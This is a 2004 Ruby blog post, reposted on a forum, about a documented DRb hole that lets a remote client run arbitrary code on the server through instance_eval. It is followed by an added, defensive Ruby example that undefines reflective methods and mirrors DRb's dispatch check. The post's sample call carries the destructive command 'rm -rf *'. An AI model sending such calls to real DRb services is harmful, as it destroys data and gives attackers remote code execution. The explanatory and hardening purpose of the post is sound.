Ruby Buzz Forum
DRb & instance_eval

Red Handed

Posts: 1158
Nickname: redhanded
Registered: Dec, 2004

Red Handed is a Ruby-focused group blog.
DRb & instance_eval Posted: Dec 31, 2004 2:44 PM

This post originated from an RSS feed registered with Ruby Buzz by Red Handed.
Original Post: DRb & instance_eval
Feed Title: RedHanded
Feed URL: http://redhanded.hobix.com/index.xml
Feed Description: sneaking Ruby through the system

There is a nice, little, documented security hole in DRb. Hopefully this’ll help us all remember the importance of $SAFE in our lives.

The DRb manual illustrates with the following code:

 ro = DRbObject::new_with_uri("druby://your.server.com:8989")
 class << ro
   undef :instance_eval  # force call to be passed to remote object
 end
 ro.instance_eval("`rm -rf *`")

So this nugget exposes the unflavoured DRb service to injection of any arbitrary code. Many of you would probably question the legitimacy of leaving a hole like this open. But see: the answer is to give $SAFE = 1, which can’t be a default, can it?

So, if you’re out tinkering with DRb: untaint wisely.

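The mitigation side of the post, as an added example that is not from the original post or the DRb manual: the hole exists because every Ruby Object carries public reflective methods (instance_eval, send, ...) and DRb's server dispatches any public method a remote caller names. The post's answer, $SAFE = 1, was removed in Ruby 3.0, so this example instead hardens the front object by undefining those methods and mirrors DRb's dispatch gate locally (no network, no drb require) so the before/after can be checked. SafeFront, remotely_callable?, dispatch and exposed_reflective_methods are hypothetical names written for this example.

```ruby
# Hypothetical front object for DRb.start_service: it exposes only its own
# API. The reflective methods inherited from Object/Kernel are undefined so a
# remote caller cannot reach them (leaving __send__ alone: DRb uses it
# internally and rejects it by name).
class SafeFront
  REFLECTIVE = %i[instance_eval instance_exec send public_send method
                  public_method define_singleton_method extend
                  instance_variable_set instance_variable_get].freeze
  REFLECTIVE.each { |m| undef_method m }

  def status
    "ok"
  end

  def add(a, b)
    Integer(a) + Integer(b)   # remote arguments are untrusted; coerce explicitly
  end
end

# Mirror of the gate DRb's server applies before dispatching a remote call
# (DRbServer#check_insecure_method): the name must be a Symbol, must not be
# __send__, and must be a public method of the front object; private and
# protected methods are refused. Re-implemented here so the example runs
# stand-alone.
def remotely_callable?(front, name)
  return false unless name.is_a?(Symbol)
  return false if name == :__send__
  front.public_methods.include?(name)
end

# Simulated server-side dispatch of a remote request for `name`.
def dispatch(front, name, *args)
  raise SecurityError, "insecure method `#{name}'" unless remotely_callable?(front, name)
  front.__send__(name, *args)
end

# Which reflective methods a remote client could still invoke on `front`.
def exposed_reflective_methods(front)
  SafeFront::REFLECTIVE.select { |m| remotely_callable?(front, m) }
end

if __FILE__ == $0
  p exposed_reflective_methods(Object.new)     # includes :instance_eval (the hole)
  p exposed_reflective_methods(SafeFront.new)  # []
  p dispatch(SafeFront.new, :add, 2, 3)        # 5
end
```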
